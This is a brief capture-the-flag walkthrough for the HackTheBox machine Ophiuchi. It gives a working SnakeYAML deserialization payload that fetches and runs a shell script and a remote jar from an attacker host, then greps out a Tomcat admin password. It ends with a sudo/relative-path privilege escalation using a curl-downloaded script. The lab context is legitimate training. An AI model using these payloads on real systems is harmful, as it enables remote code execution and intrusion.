SnakeYAML, Go & WebAssembly - Ophiuchi @ HackTheBox
We are going to solve Ophiuchi a 30-point machine on HackTheBox that involves a YAML parser vulnerability and a custom program we can execute with sudo, which loads a web assembly file and executes a shell script without using the absolute path.
Notes
SnakeYAML Parser vulnerability
- https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
- https://github.com/artsploit/yaml-payload
Change payload to:
1
2
Runtime.getRuntime().exec("wget 10.10.14.97/x -O /tmp/x");
Runtime.getRuntime().exec("/bin/sh /tmp/x");
Compile:
1
2
javac yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf payload.jar -C yaml-payload/src/ .
Send Exploit:
1
2
3
4
5
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.97/payload.jar"]
]]
]
Get Admin Password
1
2
grep -ir "password" .
/tomcat/conf/tomcat-users.xml:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
WebAssembly “main.c”:
1
2
3
int info() {
return 1;
}
Compile with emscripten:
1
sudo docker run --rm -v $(pwd):/src -u $(id -u):$(id -g) emscripten/emsdk emcc --no-entry main.c -s WASM=1 -o main.html -s "EXPORTED_FUNCTIONS=['_info']";
Transfer & Execute:
1
2
3
4
5
cd /tmp
curl 10.10.14.97/main.wasm > main.wasm
curl 10.10.14.97/x > deploy.sh
chmod +x deploy.sh
sudo /usr/bin/go run /opt/wasm-functions/index.go
This post is licensed under CC BY 4.0 by the author.